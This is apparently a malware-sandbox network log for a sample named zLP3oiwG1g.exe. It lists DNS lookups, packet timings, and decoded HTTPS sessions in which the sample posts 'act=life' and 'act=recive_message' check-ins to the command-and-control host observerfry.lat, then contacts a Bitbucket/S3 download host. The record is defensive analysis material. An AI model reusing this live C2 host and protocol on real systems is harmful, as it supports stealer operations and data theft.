                                                                                                                                                                              Dec 23, 2024 08:09:03.009473085 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.009520054 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.009552002 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.009562016 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.009584904 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.016300917 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.016346931 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.016386986 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.016396999 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.016422033 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.022833109 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.022875071 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.022903919 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.022912979 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.022939920 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.029174089 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.029217958 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.029254913 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.029266119 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.029277086 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.035578966 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.035613060 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.035651922 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.035660982 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.035679102 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.078461885 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.401437044 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.453468084 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.515886068 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.515902042 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.515921116 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.515928984 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.515959024 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.515964985 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516005039 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.516046047 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.516060114 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516778946 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516803980 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516814947 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516828060 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516850948 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.516860008 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516881943 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.518922091 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.518955946 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.518990040 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.518992901 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.519005060 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.519035101 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.519057989 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.519963026 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.519978046 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.520008087 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.520042896 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.520051956 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.520066977 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.521722078 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.521745920 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.521786928 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.521795988 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.521827936 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.522651911 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.522666931 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.522723913 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.522732019 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.522749901 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.961338043 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.967638016 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.967680931 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.967717886 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.967725992 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.967751026 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.974078894 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.974133015 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.974150896 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.974159956 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.974204063 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.974220991 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.974381924 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.980031967 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.980077028 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.980109930 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.980117083 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.980134010 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.980166912 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.980855942 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.987304926 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.987368107 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.987390995 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.987416983 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.987435102 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.993923903 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.993978977 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.994024038 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.994051933 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.994065046 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.047195911 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.047220945 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.094074011 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.111748934 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.134243965 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.143585920 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.143624067 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.143676996 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.143695116 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.143695116 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.143697977 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.143733025 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.143760920 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.143760920 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.147135019 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.147146940 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.149878979 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.149934053 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.149955988 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.149995089 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.149995089 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.150002956 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.156234980 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.156325102 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.156336069 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.156354904 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.156397104 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.162729025 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.162825108 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.162863970 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.162887096 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.162904024 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.169441938 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.169508934 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.169522047 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.169531107 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.169598103 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.175980091 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.176054955 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.176117897 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.176137924 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.176137924 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.176148891 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.176302910 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.182461023 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.182528973 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.182600021 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.182600021 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.182617903 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.183224916 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.183231115 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.188832998 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.188903093 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.188935041 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.188946962 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.188986063 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.234884977 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.234941006 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.281630039 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.338862896 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.338897943 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.338947058 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.338968039 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.339044094 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.339044094 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.339045048 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.339066982 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.339086056 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.339164972 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.345144033 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.345165014 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.345215082 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.345248938 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.345261097 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.345304012 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.348891020 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.348946095 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.349049091 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.349049091 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.349059105 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.349090099 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.349551916 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.603941917 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.624697924 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.990690947 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.990690947 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.990710974 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.990720034 CET4434978052.217.67.100192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 08:08:35.366293907 CET | 50142 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 08:08:35.504230976 CET | 53 | 50142 | 1.1.1.1 | 192.168.2.10
Dec 23, 2024 08:08:55.218497038 CET | 60640 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 08:08:55.439575911 CET | 53 | 60640 | 1.1.1.1 | 192.168.2.10
Dec 23, 2024 08:08:57.489223957 CET | 51651 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 08:08:57.629029036 CET | 53 | 51651 | 1.1.1.1 | 192.168.2.10
Dec 23, 2024 08:08:59.906259060 CET | 65239 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 08:09:00.137119055 CET | 53 | 65239 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 08:08:35.366293907 CET | 192.168.2.10 | 1.1.1.1 | 0x9a9e | Standard query (0) | observerfry.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:08:55.218497038 CET | 192.168.2.10 | 1.1.1.1 | 0xf7f7 | Standard query (0) | observerfry.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:08:57.489223957 CET | 192.168.2.10 | 1.1.1.1 | 0x7a1b | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:08:59.906259060 CET | 192.168.2.10 | 1.1.1.1 | 0x8a60 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 08:08:35.504230976 CET | 1.1.1.1 | 192.168.2.10 | 0x9a9e | No error (0) | observerfry.lat | | 104.21.36.201 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:08:35.504230976 CET | 1.1.1.1 | 192.168.2.10 | 0x9a9e | No error (0) | observerfry.lat | | 172.67.199.72 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:08:55.439575911 CET | 1.1.1.1 | 192.168.2.10 | 0xf7f7 | No error (0) | observerfry.lat | | 172.67.199.72 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:08:55.439575911 CET | 1.1.1.1 | 192.168.2.10 | 0xf7f7 | No error (0) | observerfry.lat | | 104.21.36.201 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:08:57.629029036 CET | 1.1.1.1 | 192.168.2.10 | 0x7a1b | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:08:57.629029036 CET | 1.1.1.1 | 192.168.2.10 | 0x7a1b | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:08:57.629029036 CET | 1.1.1.1 | 192.168.2.10 | 0x7a1b | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:09:00.137119055 CET | 1.1.1.1 | 192.168.2.10 | 0x8a60 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 08:09:00.137119055 CET | 1.1.1.1 | 192.168.2.10 | 0x8a60 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 08:09:00.137119055 CET | 1.1.1.1 | 192.168.2.10 | 0x8a60 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.67.100 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:09:00.137119055 CET | 1.1.1.1 | 192.168.2.10 | 0x8a60 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.24.197 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:09:00.137119055 CET | 1.1.1.1 | 192.168.2.10 | 0x8a60 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.64.124 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:09:00.137119055 CET | 1.1.1.1 | 192.168.2.10 | 0x8a60 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.131.121 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:09:00.137119055 CET | 1.1.1.1 | 192.168.2.10 | 0x8a60 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.12.254 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:09:00.137119055 CET | 1.1.1.1 | 192.168.2.10 | 0x8a60 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.76.204 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:09:00.137119055 CET | 1.1.1.1 | 192.168.2.10 | 0x8a60 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.31.106 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:09:00.137119055 CET | 1.1.1.1 | 192.168.2.10 | 0x8a60 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.250 | A (IP address) | IN (0x0001) | false
• observerfry.lat
• bitbucket.org
• bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49713 | 104.21.36.201 | 443 | 7300 | C:\Users\user\Desktop\zLP3oiwG1g.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:08:36 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: observerfry.lat
2024-12-23 07:08:36 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-23 07:08:37 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:08:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=lseabovgdiar0u927osnmdh304; expires=Fri, 18 Apr 2025 00:55:16 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bZ8alXBjT2lZ%2Fr8Ji5zfbmF9XrdxwVcuy%2BboXhdeR2zRo%2FxUfgKAXFGsJdTSL%2Bl4YRDRif6NbzGtbOjrDaRyCcNphz1ZxPXYqYLzFLPE3Y6L8gNRHkNpflXeWlE3aQXkOkU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f66857b3a2a9e1a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=1989&rtt_var=768&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1405873&cwnd=211&unsent_bytes=0&cid=9ef1ee9e0fe6e651&ts=747&x=0"
2024-12-23 07:08:37 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 07:08:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49719 | 104.21.36.201 | 443 | 7300 | C:\Users\user\Desktop\zLP3oiwG1g.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:08:38 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: observerfry.lat
2024-12-23 07:08:38 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-23 07:08:39 UTC | 1121 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:08:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8n7tkk2i129un6kkrf4thurik6; expires=Fri, 18 Apr 2025 00:55:18 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81hQLUIzqRKIARyamU8jS0bMOwR0DZoRvKzMEonKaRxZ4eeXS4ftVP5vBhBc7o%2FZRTFj45dza5zYAJhGUSl2%2FPeF6TKhqqzHxSOuwIEwfJkiUfjlU7o2eQXS6RywiAc9Er4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f668587ab5c5e7e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2176&min_rtt=2169&rtt_var=829&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1308243&cwnd=233&unsent_bytes=0&cid=1cdb63fd8d5b0446&ts=779&x=0"
